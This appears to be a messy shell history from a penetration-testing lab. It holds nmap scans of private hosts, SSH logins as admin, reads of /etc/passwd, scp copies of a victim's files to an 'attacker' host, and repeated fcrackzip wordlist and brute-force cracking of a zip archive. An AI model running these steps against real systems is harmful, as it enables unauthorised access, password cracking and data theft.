fcrackzip -b invoices2019.zip
fcrackzip -b -u invoices2019.zip
fcrackzip -b -v -u invoices2019.zip
fcrackzip -b -v -u invoices2019.zip
ls
cd Desktop/
ls
.\\invoices2019.zip
cd Desktop/
fcrackzip -b -c 'a1' -l 6-10 -v -u invoices2019.zip
fcrackzip -b
fcrackzip -b invoices2019.zip
fcrackzip -h
fcrackzip -D -v -u invoices2019.zip
ssh admin@10.1.26.9
ls
exit
scp admin@10.1.26.9:Mydata.xlsx Desktop/
ls
scp admin@10.1.26.9:Mydata.xlsx Desktop
fcrackzip -h
ls
cd ..
scp admin@10.1.26.9:Mydata.xlsx Desktop/
cd Desktop/
ls
ssh admin@10.1.26.9
ls
cd Croatia\\ 2019/
ls
cd ../Italy\\ 2018/
ls
cd ..
ls
.\\Treasure-Island.pdf
exit
scp admin@10.1.26.9:Treasure-Island.pdf Desktop/
scp admin@10.1.26.9:Treasure-Island.pdf
scp admin@10.1.26.9:Treasure-Island.pdf Desktop/
cd ..
scp admin@10.1.26.9:Treasure-Island.pdf Desktop/
scp admin@10.1.26.9:Romeo-and-Juliet.pdf Desktop/
fcrackzip
fcrackzip -h
fcrackzip -b -l 10 -v -u Desktop/invoices2019.zip
ssh admin@10.1.26.9
ls
cd Croatia\\ 2019/
ls
cd ../Italy\\ 2018/
ls
cd ..
cd ..
ls
cd admin/
ls
cd ..
cd ..
ls
cd vagrant/
ls
cd ..
cd home/
ls
cd admin/
ls
cd ..
ls
cd ..
ls
cd ..
ls
cd lost+found/
cd media/
ls
cd ..
cd bin
ls
cd ..
ls
cd root
cd etc/
ls
cat passwd
cat passwd-
cd ..
ls
cd usr/share/
ls
wordlists
exit
cd ..
ls
cd usr/share/
ls
cd wordlists/
ls
cat fasttrack.txt
fcrackzip -v -u -D -p /usr/share/wordlists/fasttrack.txt Desktop/invoices2019.zip
ssh admin@10.1.26.9
passwd admin
exit
ssh admin@10.1.26.9
ls
cd docu
cd Documents/
ls
cd
cd desktop
cd Desktop
ls
cd Downloads
cd
cd Downloads
ls
cd
ls
cd .gnupg/
ls
cd
ls
cd downloads
cd Downloads
ls
cd
clear
cd
cd ls
ls
cd Downloads
ls
cd Documents
ls
cd
cd Documents
ls
cd
cd Desktop
ls
cd
cd Music
ls
cd
cd Pictures
ls
cd-create-profile
cd-fix-profile
cd-it8
cd
cd Public/
ls
cd
cd Templates/
ls
cd
cd Videos
ls
ls
cdclear
clear
cd
ls
clear
ls
cd .config/
ls
cd dconfig
cd dconf
ls
cat user
cd
cd .config/
ls
ls qterminal.org
cat qterminal.org/
cd qterminal.org/
ls
cat qterminal.ini
clear
nmap -v -A scanme.nmap.org
cd
ipconfig
ip
nmap -v -sn 10.1.26.4
nmap -v -r
ipconfig
ip
ifconfig
help
nmap scan
nmap -sS -O scanme.nmap.org
nmap -sS -O scanme.nmap.org/24
nmap -sS 10.1.26.4/9
nmap - PS
nmap -PS
nmap -sL
nmap -sL 10.1.26.4
nmap -A
nmap -A 10.1.26.4
nmap -A 10.1.26.9
nmap -pS 10.1.26.4
nmap -p 10.1.26.4
--help
-help
help
scan
--help
clear
help
man -k
man -K
man man
nam --help
nmap --help
nmap -PS 10.1.26.4
nmap -A 10.1.26.6
nmap -A 10.1.26.9
nmap --help
nmap -PS 10.1.26.4
nmap -PS 10.1.26.9
exit
ssh --help
ssh host_ip_address
ssh your_username@host_ip_address
ssh 10.1.26.9
ssh 10.1.26.9
ssh attacker 10.1.26.9
ssh attacker@10.1.26.9
ssh admin@10.1.26.9
ls
cat invoices2019.zip
clear
ls
cat Mydata.xlsx
ls
ccd
cd
nfs
nfs --help
nfs --help
cd Croatia\\ 2019/
ls
cd
cat Treasure-Island.pdf
ls
cat Romeo-and-Juliet.pdf
clear
scp --help
scp help
scp admin@10.1.26.9:/invoices2019.zip root@attacker:/Documents
scp admin@10.1.26.9:/invoices2019.zip root:/Documents
ls
scp admin@10.1.26.9:invoices2019.zip root:Documents
ls
cd Documents
ls
cd
scp admin@10.1.26.9:invoices2019.zip root/Documents
scp admin@10.1.26.9:invoices2019.zip root@attacker/Documents
scp admin@10.1.26.9:invoices2019.zip root@attacker:/Documents
scp admin@10.1.26.9:invoices2019.zip/root/Documents
scp admin@10.1.26.9:invoices2019.zip /root/Documents
cd Documents
ls
cd
fcrackzip
fcrackzip --help
ls
wordlist --help
locate wordlist
cd user
cd User
usr
cd usr
cd usr
ls
cd /usr
ls
cd share
ls
cd wordlists
ls
cat fasttrackt.txt
cd
cd /usr/share/wordlists
ls
cd fasttrack.txt
cd
fcrackzap -u -D -p /user/share/wordlists/fasttrack.txt invoices2019.zip
fcrackzip -u -D -p /user/share/wordlists/fasttrack.txt invoices2019.zip
cd Docuemtns
cd Documents
ls
cd invoices2019.zip
cd
fcrackzip -u -D -p /user/share/wordlists/fasttrack.txt invoices2019.zip
cd Documents/
fcrackzip -u -D -p /user/share/wordlists/fasttrack.txt invoices2019.zip
cd
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt invoices2019.zip
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt invoices2019.zip
cd Documents/
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt invoices2019.zip
cat invoices2019.zip
cd invoices.2019
cd invoices2019.zip
clear
net user loginid
net user admin newpassword
net --help
net user admin
passwd tom admin
passwd -e admin
passwd -a
passwd -a admin
passwd -a admin
passwd --help
clear
passwd --help
passwd -d admin
passwd -r r
passwd -r admin
passwd -r
passwd -u admin
passwd admin
cd
nmap -PS 10.1.26.9
cd /usr
cd share
cd wordslists
ls
cd wordlists
ls
fcrackzip --help
cd
cd Documents/
fcrackzip -u -p /usr/share/wordlists/fasttrack.txt invoices2019.zip
cd Documents/
fcrackzip -D -p /usr/share/wordlists/fasttrack.txt invoices2019.zip
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt invoices2019.zip
--help nmap
nmap --help
nmap -v -A 10.1.26.4
sudo nmap 10.1.26.4
sudo nmap 10.1.26.5
10.1.26.9
sudo nmap 10.1.26.9
sS
ssh admin@admin
ssh 10.1.26.9 admin@admin
ssh admin@10.1.26.9
ls
ls invoices2019.zip
cp invoices2019.zip
cp --help
cp invoices2019.zip documents
cp invoices2019.zip /documents
cp invoices2019.zip ~/Documents
scp --help
scp invoices2019.zip root@attacker:/Documents
scp invoices2019.zip root@attacker:/root/Documents
scp invoices2019.zip root@attacker
ifconfig
scp invoices2019.zip root@10.0.2.15
scp invoices2019.zip root@10.0.2.23
ssh admin@10.1.26.9
cd
ls
clear
scp admin@10.1.26.9:invoices.zip /home
scp admin@10.1.26.9:invoices2019.zip /home
--help fcrackzip
fcrackzip --help
fcrackzip -b /home/invoices2019.zip
sudo apt update
sudo apt install john fcrackzip wordlists
locate wordlist
fcrack -u -D -p /usr/share/wordlists/rockyou.txt /home/invoices2019.zip
fcrack -u -D -p /usr/share/wordlists/rockyou.txt invoices2019.zip
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt /home/invoices2019.zip
ls
locate wordlist
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt.gz /home/invoices2019.zip
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt.gz /home/invoices2019.zip
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt.gz /home/invoices2019.zip
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt /home/invoices2019.zip
sudo root
passwd
nmap --help
nmap -v -A scanme.nmap.org
nmap
nmap -v -A scnamme.nmap.org
nmap -v -A scanmme.nmap.org
nmap -v -A scanme.nmap.org
--help
nmap --help
nmap -v -A scanme.nmap.org
nmap --help
nmap -A 10.1.26.9
nmap -A 10.1.26.4
nmap -A 10.1.26.4
nmap -A 10.1.26.4
nmap -A 10.1.26.9
ssh root@10.1.26.9
ssh root@10.1.26.9
ssh root@10.1.26.9
ssh --help
ssh admin@10.1.26.9
cd
cd directory
ls
fcrackzip -D -p list -u
fcrackzip -D -p list -u invoices2019.zip
cd invoicees2019.zip
cd invoices2019.zip
fcrackzip -u -D -p invoices2019.zip
ls
cd invoices2019.zip
cd invoices2019
ls
fcrackzip -b -c 'a' -l 1-5 -u invoices2019.zip
ld
ls
cd documents
cd Documents
ls
cd Downloads
clear
ls
cd downloads
cd Downloads
ls
fcrackzip -b -c 1 -v -u -l 7-7 invoices2019.zip
sudo apt update
sudo apt install john fcrackzip wordlists
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt invoices2019.zip
ls
cd invoices2019.zip
scp admin@10.1.26.9:invoices2019.zip /root/Downloads
ls
cd Downloads
ls
fcrackzip -D -p list -i invoices2019.zip
fcrackzip -D -p list -u invoices2019.zip
locate worldlist
locate worldlists
locate wordlist
cd
ls
clear
locate wordlist
cd/usr/
cd /usr/
ls
cd /share
cd /usr/share/worldlist/
cd /usr/share/worldlists/
cd /usr/share/worldlists/
cd
cd /usr/share/worldlists/
cd /usr/share/wordlists/
ls
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt invoices2019.zip
passwd admin
nmap
nmap -A 10.1.26.4
nmap -A 10.1.26.9
nmap -A 10.1.26.4
ssh admin@10.1.26.9
ssh admin@10.1.26.9
ssh
ssh admin@10.1.26.9
toor
ssh admin@10.1.26.9
clear
ssh admin@10.1.26.9
ls
ls
cd invoices2019.zip
clear
fcrackzip -b invoices2019.zip
unzip invoices2019.zip
[3~
ls
cd invoices2019
ls
rmdir
rmdir invoices2019
cd
rmdir invoices2019
cd
cd
ssh admin@10.1.26.9
ls
sudo apt install john fcrackzip wordlists
sudo apt update
sudo apt install john fcrackzip wordlists
ssh admin@10.1.26.9
ssh admin@10.1.26.9
fcrackzip.exe-help
fcrackzip.exe -help
fcrackzip.exe --help
fcrackzip
--help
fcrackzip --help
sudo apt-get install fcrackzip
fcrackzip -u -D -p /usr/share/wordlists.fasttrack.txt invoices2019.zip
fcrackzip -u -D -p /usr/share/wordlists.fasttrack.txt
fcrackzip -u -D -p /usr/share/wordlists.fasttrack.txt invoices2019.zip
clear
ls
fcrackzip -u -D -p /usr/share/wordlists.fasttrack.txt invoices2019.zip ssh admin@10.1.26.9
ssh admin@10.1.26.9
ls
download invoices2019.zip
--help
--help
cd invoices2019.zip
ls
cd invoices2019.zip
cd
cd
cd italy 2018
cd mydata.xlsx
cd
ls
extraxt
ext
cd /mydata.xlsx
cd
ls
clear
cd /usr
cd /share
cd
cd
cd
cd /usr/share/wordlists/
ls
cd /fasttrack.txt
cd fasttrack.txt
cd /fasttrack.txt
cd
cd
cd
cd
cd /usr/share/wordlists/fasttrack.txt
ls
cd/usr
cd /sur
cd /usr
cd /share
ls
cd /share
cd share
ls
cd wordlists
cd fasttrack.txt
ls
cd fasttrack.txt
cd fasttrack
ls
get fasttrack.txt
get /fasttrack.txt
get fasttrack
get fasttrack.txt
ls
cat fasttrack.txt
cp -r invoices2019 desktop
ls
cp -r invoices2019.zip desktop
ls
desktop
cd desktop
cat desktop
cd
ls
dir -r desktop
ls
mkdir -r desktop
mkdir --help
cd
ls
-r desktop
--help
rmdir desktop
rm desktop
ls
cp -r invoices2019.zip root/desktop
cp -r invoices2019.zip /root/desktop
sudo cp -r invoices2019.zip /root/desktop
cp -r invoices2019.zip
cp -r invoices2019.zip home
ls
rm home
ls
cp -r invoices2019.zip password
cp -r home /root/home
rm home
ls
rm password
ls
scp invoices2019.zip ssh admin@server:/root/desktop
scp invoices2019.zip ssh admin@server:/root/desktop
scp invoices2019.zip ssh root@attacker:/root/desktop
scp invoices2019.zip ssh root@server:/root/desktop
scp /home/admin/invoices2019.zip ssh root@attacker:/root/desktop
scp admin@server:/home/admin/invoices2019.zip /root/desktop
toor
clear
cd
cd
cd
cd
cd
cd
ls
ipconfig
infconfig
config
nmap ipconfig
nmap infconfig
nmap --help
nmap ifconfig
ifconfig
scp /home/admin/invoices2019.zip ssh root@10.0.2.15:/root/desktop
scp /home/admin/invoices2019.zip ssh root@10.1.26.23:/root/desktop
clear
passwd admin
passwd admin
passwd admin
scp admin@10.1.26.9:invoices2019.zip /home
cd home
cd /home
ls
cd
scp admin@10.1.26.9:invoices2019.zip /root/home
fcrackzip -u -D -p /root/home
fcrackzip -u -D -p /root/home/invoices2019.zip
fcrackzip -u -D -p invoices2019.zip
fcrackzip -u -D -p /root/home.zip
locate wordlists
cd /usr/share/wordlists/
ls
cd ..
cd
cd
cd
cd
cd
cd
cd
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt home
fcrackzip --help
cd Desktop
ls
cd
ls
cd Documents/
ls
ls
unzip invoices2019.zip
ls
cat invoices2019
cd invoices2019/
ls
cd
rmdir invoices2019/
ls
fcrackzip -u -D -p /usr/share/wordlists.fasttrack.txt
Fcrackzip --help
usage fcrackzip
fcrackzip
ls
/root/Desktop/kali-fcrackzip.desktop
root fcrackzip
sudo fcrackzip
fcrackzip -u -D -p /usr/share/wordlists.fasttrack.txt
sudo fcrackzip -u -D -p /usr/share/wordlists.fasttrack.txt
sudo fcrackzip -u -D -p /usr/share/wordlists.fasttrack.txt
rooot fcrackzip -u -D -p /usr/share/wordlists.fasttrack.txt
root fcrackzip -u -D -p /usr/share/wordlists.fasttrack.txt
clear
fcrackzip -u -D -p /usr/share/wordlists.fasttrack.txt invoices2019.zip
locate wordlists
locate rockyou
ls
locate rockyou
locate wordslists
locate wordlist
fcrackzip -u -D -p /usr/share/wordlists.fasttrack.txt invoices2019.zip
ls
lx
ls
sudo apt-get install fcrackzip
sudo apt-get install fcrackzip
apt-get install fcrackzip
fcrackzip -u -D -p /usr/share/wordlists.fasttrack.txt invoices2019.zip
fcrackzip -u -D/usr/share/wordlists.fasttrack.txt invoices2019.zip
fcrackzip -u -D /usr/share/wordlists.fasttrack.txt invoices2019.zip
fcrackzip -u -D /usr/share/wordlists.fasttrack.txt invoices2019.zip
unzip invoices2019.zip
ls
rmdir invoices2019/
rmdir -r invoices2019/
rm -r invoices2019
ls
clear
ls
cd
cd
ls
locate invoices.zip
cp invoices2019.zip
cp --help
/etc/hosts
/etc/hosts
sudo /etc/hosts
sudo /etc/hosts
sudo /etc/hosts
ls
cd Do
cd Documents/
ls
cd etc
cd /etc
ls
cd hosts
cd host
cd
ipa
ip a
/usr/share/
cd /usr/share/
/wordlists
cd /wordlists
ls
cd
cd
cd
cd /usr/share/wordlists/
ls
cd /fa
cd /fasttrack.txt
cat fasttrack.txt
clear
ls
cat fasttrack.txt
cd
cd
cd
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt invoices2019.zip
cp -r invoices2019.zip
cp -r/R invoices2019.zip
cp invoices2019.zip
cp invoices2019.zip /root/desktop
sudo cp invoices2019.zip /root/desktop
sudo cp invoices2019.zip /root/desktop
cp invoices2019.zip /root/desktop
cp invoices2019.zip /desktop
cp -r invoices2019.zip /desktop
cp -r invoices2019.zip desktop
ls
cd d
cd desktop
rm desktop
ls
cp -r /admin/invoices2019.zip /root/desktop
root cp -r /admin/invoices2019.zip /root/desktop
sudo cp -r /admin/invoices2019.zip /root/desktop
cd /home
ls
cd admin/
ls
cd /home/admin/invoices.zip /root/desktop
cd -r /home/admin/invoices.zip /root/desktop
cd -r /home/admin/invoices.zip /root/Desktop
cd -r/R /home/admin/invoices.zip /root/Desktop
cd /home/admin/invoices.zip /root/desktop
cd /home/admin/invoices.zip/ /root/desktop/
cd /home/admin/invoices.zip /root/desktop/
cd /home/admin/*.zip /root/desktop/
cd /home/admin/* /root/desktop/
cd -p /home/admin/*.zip /root/desktop/
cd -P /home/admin/*.zip /root/desktop/
man cp
scp /home/admin/invoices2019.zip admin@server:/root/desktop
sudo scp /home/admin/invoices2019.zip admin@server:/root/desktop
scp /home/admin/invoices2019.zip root@attacker:/root/desktop
scp /home/admin/invoices2019.zip root@attacker:/root/desktop
scp admin@server:/home/admin/invoices2019.zip /root/desktop
scp /home/admin/invoices2019.zip root@attacker:/root/desktop
scp admin@server:/home/admin/invoices2019.zip root@attacker:/root/desktop
scp admin@server:/home/admin/invoices2019.zip /root/desktop
showmount -e
/etc/export
cd /etc/export
cd /etc
ls
cd exports
scp /home/admin/invoices2019.zip root@attacker:/root/desktop
ifconfig
scp /home/admin/invoices2019.zip 10.1.26.23:/root/desktop
scp /home/admin/invoices2019.zip admin@server:/root/desktop
cd
scp /home/admin/invoices2019.zip admin@server:/root/desktop
scp /home/admin/invoices2019.zip root@attacker:/root/desktop
scp /home/admin/invoices2019.zip root@attacker/root/desktop
scp /home/admin/invoices2019.zip root@attacker /root/desktop
scp /home/admin/invoices2019.zip root@attacker:/root/desktop
passwd admin
clear
passwd admin
clear
passwd admin
ssh admin@10.1.26.9
ls
scp admin@10.1.26.9:/invoices2019.zip /home
scp admin@10.1.26.9:invoices2019.zip /home
scp admin@server:invoices2019.zip /home
scp admin@10.1.26.9:invoices2019.zip /desktop
scp admin@10.1.26.9:invoices2019.zip /root/home
cd root
cd /root/
ls
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt home.zip
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt invoices2019.zip
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt home
cd Desktop
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt home
clear
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt home
cd ..
/usr/share/
locate wordlists
cd /usr/
ls
cd /share
cd /shafre
cd
cd /usr/share/wordlists/
ls
ls
Fcrackzip -u -D -P /usr/share/wordlists/fasttrackt.txt invoices2019.zip
fcrackzip
fcrackzip --help
exit
exit
exit
pdw
pwd
ls
scp root@10.0.2.15:/root /home/admin/invoices2019.zip
scp root@10.0.2.15:/root /home/admin/invoices2019.zip
exit
scp root@10.0.2.15:/root /home/admin/invoices2019.zip
exit
nmap -A 10.1.26.9
nmap -A 10.1.0.0
nmap -A 10.1.26.9
nmap -A 10.1.26.9
ls -al
frackzip -c a -p aaaaaa invoices2019.zip
fcrackzip -c a -p aaaaaa invoices2019.zip
pwd
scp admin@10.1.26.9:/home/admin/invoices2019.zip invoices2019.zip
ls
fcrackzip -c a -p aaaaaa invoices2019.zip
frackzip -v -u -b -c a -l 6 invoices2019.zip
fcrackzip -v -u -b -c a -l 6 invoices2019.zip
fcrackzip -v -u -b -c a -l 8 invoices2019.zip
ls
cd /opt/
ls
cd
ls
fcrackzip -b -c 'a1' -l 1-8
fcrackzip -b -c 'a1' -l 1-8 invoices2019.zip
fcrackzip -b -c 'a1' -l 1-8 -v -u invoices2019.zip
/usr/share/wordlists/
ls
cd /usr/share/wordlists/
ls
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt invoices2019.zip
ls
rm invoices2019.zip
ls
clear
nmap -p- 10.1.26.4
nmap -p- 10.1.26.9
man ssh
man ssh --example
ssh 10.1.26.9
ssh admin@10.1.26.9
ls
scp admin@10.1.26.9:/home/admin/invoices2019.zip invoices2019.zip
ls
fcrackzip --help
fcrackzip -v -u -D -p /usr/share/wordlists/fasttrack.txt invoices2019.zip
fcrackzip --help
nmap -p- 10.1.26.4
nmap -p- 10.1.26.9
ssh admin@10.1.26.9
ls
ls -l
pwd
scp admin@10.1.26.9:/home/admin/invoices2019.zip invoices2019.zip
ls -l /usr/share/wordlists
fcrackzip -D -p /usr/share/wordlists/fasttrack.txt -u /root/invoices2019.zip -v
passwd admin
passwd admin
passwd admin
uname
whoami
who
ifconfig
nmap 10.0.2.15
nmap 10.1.26.23
nmap 10.1.26.23/24
nmap 10.0.2.15/24
nmap 10.0.2.15/24 -O
ifconfig
nmap 127.0.0.1/24 -O
clear
nmap 10.0.2.15
nmap 10.0.2.15 -O
nmap 10.0.2.15/24 -O
--help
clear
-help
help
clear
ifconfig
nmap 10.0.2.15 -O
nmap 10.0.2.15 -O
nmap 10.0.2.15/24
nmap -A -T4 -p- 10.1.26.9
ssh 10.1.26.9
ssh admin@10.1.26.9
ls
cd invoices2019.zip
ls
cp ~invoices2019.zip
scp admin@10.1.26.9
scp admin@10.1.26.9:/invoices2021.zip/home
scp admin@10.1.26.9/invoices2021.zip/home
scp admin@10.1.26.9/invoices2021.zip /home
scp admin@10.1.26.9/invoices2019.zip /home
scp admin@10.1.26.9:/invoices2019.zip /home
cp admin@10.1.26.9:/invoices2019.zip /home
scp admin@10.1.26.9:/invoices2019.zip /home
ls
scp admin@10.1.26.9:invoices2019.zip /home
scp admin@10.1.26.9:invoices2021.zip /home
scp admin@10.1.26.9: invoices2019.zip /home
scp admin@10.1.26.9:/zip /home
scp admin@10.1.26.9:/invoices2019.zip /home
scp admin@10.1.26.9:invoices2019.zip /home
scp admin@10.1.26.9:invoices2019.zip /home
scp admin@10.1.26.9:invoices2019.zip /home
scp admin@10.1.26.9:invoices2019.zip /home
ls
cd /home
ls
fcrackzip -u -c 1 -l 4-8 /home/invoices2019.zip
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt /home/invoices2019.zip
passwd
passwd
passwd admin
passwd root
history
--help
help
-help
-- help
help
clear
help
clear
nmap -A-T4 -p- 10.1.26.9
nmap -A -T4 -p- 10.1.26.9
ssh admin@10.1.26.9
ls
ls
ls
cd home
cd Home
cd Desktop
ls
scp admin@10.1.26.9:invoices2019.zip /home
scp admin@10.1.26.9:invoices2019.zip /home
scp admin@10.1.26.9:invoices2019.zip /home
passwd admin
ls
cd /home
ls
cd /home
ls
clear
cd /Home
ls
ls
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt /home/invoices2019.zip
ifconfig
nmap -sp 10.1.26.4
nmap 10.1.26.4
nmap 10.1.26.9
ssh 10.1.26.9
ssh 10.1.26.9
ssh admin@10.1.26.9
ls
open Mydata.xlsx
open Romeo-and-Juliet.pdf
xdg-open Romeo-and-Juliet.pdf
scp admin@10.1.26.9:invoices2019.zip /root/Desktop
scp admin@10.1.26.9:invoices2019.zip /root/Desktop
scp admin@10.1.26.9:invoices2019.zip /root/Desktop
scp admin@10.1.26.9:invoices2019.zip /home
scp admin@10.1.26.9:/home/invoices2019.zip /home
exit
scp admin@10.1.26.9:invoices2019.zip /home
fcrackzip -b /Desktop/invoices2019.zip
fcrackzip -b /root/Desktop/invoices2019.zip
fcrackzip -b -u /root/Desktop/invoices2019.zip
history
fcrackzip -D -u /root/Desktop/invoices2019.zip
fcrackzip -D -u /root/Desktop/invoices2019.zip
fcrackzip -D -u /root/Desktop/invoices2019.zip
fcrackzip -b -u /root/Desktop/invoices2019.zip
fcrackzip -b -u -v /root/Desktop/invoices2019.zip
fcrackzip -v -p invoices2019 /root/Desktop/invoices2019.zip
fcrackzip -v -u -p invoices2019 /root/Desktop/invoices2019.zip
fcrackzip -v -u /root/Desktop/invoices2019.zip
fcrackzip -v -u -c invoices /root/Desktop/invoices2019.zip
fcrackzip -v -u -p invoices /root/Desktop/invoices2019.zip
fcrackzip -v -u -2 /root/Desktop/invoices2019.zip
clear
history
-D /root/Desktop/fasttrack.txt -b /root/Desktop/invoices2019.zip
fcrackzip -D /root/Desktop/fasttrack.txt -b /root/Desktop/invoices2019.zip
fcrackzip -v -u -D -p /root/Desktop/fasttrack.txt /root/Desktop/invoices2019.zip
ssh admin@10.1.26.9
passwd
end
exit
--help
clear
nmap --help
clear
whoami
clear
nmap --help
nmap 10.1.26.4
nmap 10.1.26.9
shh admin@10.1.26.9
ssh admin@10.1.26.9
whoami
ls
end
exit
scp admin@10.1.26.9:invoices2019.zip /home/Desktop
scp admin@10.1.26.9:invoices2019.zip /root/Downloads
fcrackzip
fcrackzip --help
fcrackzip -v -D -p /root/Desktop/fasttrack.txt /root/Desktop/invoices2019.zip
fcrackzip -v -u -D -p /root/Desktop/fasttrack.txt /root/Desktop/invoices2019.zip
ssh 10.1.26.9
ssh admin@10.1.26.9
passwd Beterwachtwoord123 admin
passwd Beterwachtwoord123 admin
passwd
exit
ssh admin@10.1.26.9
exit
nmap -sP 10.1.26.0/24
nmap --help
nmap -sn 10.1.26.0/24
ifonfig
ifconfig
ls
top
exit
end
exit
scp admin@10.1
scp admin@10.1.26.9:invoices2019.zip /Yeet
ls
cdcd Yeet
cd..
ls
cd Downloads/
fcrackzip -b invoices2019.zip
fcrackzip -b -u invoices2019.zip
fcrackzip -b invoices2019.zip -u
fcrackzip -b -u invoices2019.zip
fcrackzip -D -u -v invoices2019.zip
fcrackzip -B -u -v invoices2019.zip
fcrackzip --dictionary -u -v invoices2019.zip
fcrackzip --dictionary -u -v invoices2019.zip/TAX15796249.txt
fcrackzip -u -v -p admin  invoices2019.zip
fcrackzip -u -v -p adminsssss  invoices2019.zip
fcrackzip -u -v -p admin  invoices2019.zip
fcrackzip -u -v -p admin1  invoices2019.zip
fcrackzip
fcrackzip --help
fcrackzip -u -v -m invoices2019.zip
fcrackzip -u -v -m invoices2019.zip
fcrackzip -u -v -m invoices2019.zip
fcrackzip -u -v invoices2019.zip
fcrackzip -D -u -v invoices2019.zip
fcrackzip -D fasttrack.txt  -u -v invoices2019.zip
fcrackzip -D -u -v /root/Downloads/fasttrack.txt  invoices2019.zip
fcrackzip -D -u -v -p  /root/Downloads/fasttrack.txt /root/Downloads/invoices2019.zip
ssh admin@10.1.26.9
nmap 10.1.26.4
nmap 10.1.26.9
ssh 10.1.26.9:22
ssh 10.1.26.9
ssh 10.1.26.9
ssh --help
ssh admin@10.1.26.9
ls
exit
scp -r admin@10.1.26.9/invoices2019.zip /downloads
scp -r admin@10.1.26.9/invoices2019.zip local/downloads
scp admin@10.1.26.9:invoices2019.zip /downloads
ls
cd Downloads
ls
scp admin@10.1.26.9:invoices2019.zip /Downloads
ls
scp admin@10.1.26.9:invoices2019.zip root/Downloads
ls
ls
scp admin@10.1.26.9:invoices2019.zip attacker/Downloads
cd ..
scp admin@10.1.26.9:invoices2019.zip /Downloads
ls /Downloads
scp admin@10.1.26.9:invoices2019.zip root/Downloads
ls /Downloads
scp admin@10.1.26.9:invoices2019.zip /root/Downloads
ls /Downlopads
ls /Downloads
cd Downloads
ls
fcrackzip -b -u
fcrackzip -b -u invoices2019.zip
fcrackzip -b -D -u invoices2019.zip
fcrackzip -b -D -u invoices2019.zip
ls
fcrackzip -b -D -u invoices2019.zip
fcrackzip -b -D -u /invoices2019.zip
fcrackzip -b -D -u root/Downloads/invoices2019.zip
fcrackzip -b -D -u /invoices2019.zip
ls
fcrackzip -b -u /invoices2019.zip
ls
fcrackzip -b -u
fcrackzip -b -u /invoices2019.zip
fcrackzip -D -u -v invoices2019.zip
fcrackzip -D -u -v invoices2019.zip
fcrackzip -b -u -v invoices2019.zip
fcrackzip -c -u -v invoices2019.zip
fcrackzip -l -u -v invoices2019.zip
fcrackzip -V -u -v invoices2019.zip
fcrackzip -m
fcrackzip -2
fcrackzip -2 invoices2019.zip
fcrackzip -B invoices2019.zip
fcrackzip -m invoices2019.zip
fcrackzip -2 invoices2019.zip
fcrackzip -b invoices2019.zip
fcrackzip -b -u -v invoices2019.zip
sudo cp /usr/share/wordlists/rockyou.txt.gz rockyou.txt.gz
sudo cp /usr/share/wordlists/fasttrack.txt fasttrack.txt
ls
fcrackzip -v -u -D /fasttrack.txt /invoices2019.zip
fcrackzip -v -u -D fasttrack.txt invoices2019.zip
fcrackzip -v -u -D
fcrackzip -v -u -D invoices2019.zip
fcrackzip -v -u -D invoices2019.zip/TAX15796249.txt
fcrackzip -v -u -D invoices2019.zip/TAX15796249
fcrackzip -v -u -D invoices2019.zip
fcrackzip -v -u -D -p fasttrack.txt invoices2019.zip
ssh admin@10.1.26.9
ls
passwd
exit
ifconfig
nmap 10.1.26.4
nmap 10.1.26.9
ssh admin@10.1.26.9
exit
ssh admin@10.1.26.9
ls
exit
scp admin@10.1.26.23:invoices2019.zip /root/Downloads
ssh admin@10.1.26.9
exit
scp admin@10.1.26.23:invoices2019.zip /root/Downloads
scp admin@10.1.26.9:invoices2019.zip /root/Downloads
ls
ls /Downloads
ls root/Downloads
cd Downloads
ls
ls Downloads
ls /Downloads
cd ..
scp admin@10.1.26.9:Croatia /root/Downloads
ssh admin@10.1.26.9
ls
exit
scp admin@10.1.26.9:Croatia 2019 /root/Downloads
scp admin@10.1.26.9:'Croatia 2019' /root/Downloads
ssh admin@10.1.26.9
ls
cat Mydata.xlsx
ls
cat Romeo-and-Juliet.pdf
exit
scp admin@10.1.26.9:Romeo-and-Juliet.pdf /root/Downloads
ssh admin@10.1.26.9
ls
exit
scp admin@10.1.26.9:Treasuree-Island.pdf /root/Downloads
scp admin@10.1.26.9:Treasure-Island.pdf /root/Downloads
ssh admin@10.1.26.9
ls
cd 'Croatia 2019'
ls
exit
scp admin@10.1.26.9:/Croatia 2019/dubrovnik.jpg /root/Downloads
scp admin@10.1.26.9:/'Croatia 2019'/dubrovnik.jpg /root/Downloads
ls
cd Downloads
ls
fcrackzip
fcrackzip invoices2019.zip
fcrackzip invoices2019.zip --help
fcrackzip -v invoices2019.zip
fcrackzip
fcrackzip --help
fcrackzip -D /usr/share/wordlists/fasttrack.txt
fcrackzip -D /usr/share/wordlists/fasttrack.txt invoices2019.zip
frcrackzip invoices2019.txt -D /usr/share/wordlists/fasttrack.txt
fcrackzip invoices2019.txt -D /usr/share/wordlists/fasttrack.txt
fcrackzip invoices2019.txt -D
fcrackzip invoices2019.zip -D
fcrackzip invoices2019.zip
fcrackzip -D invoices2019.zip
fcrackzip -D /usr/share/wordlists invoices2019.zip
fcrackzip -D /usr/share/wordlists/fasttrack.txt invoices2019.zip
fcrackzip -D -u /usr/share/wordlists/fasttrack.txt invoices2019.zip
fcrackzip -D -u /usr/share/wordlists/fasttrack.txt invoices2019.zip
fcrackzip -v -u -D /usr/share/wordlists/fasttrack.txt invoices2019.zip
fcrackzip -v -u -D -p /usr/share/wordlists/fasttrack.txt invoices2019.zip
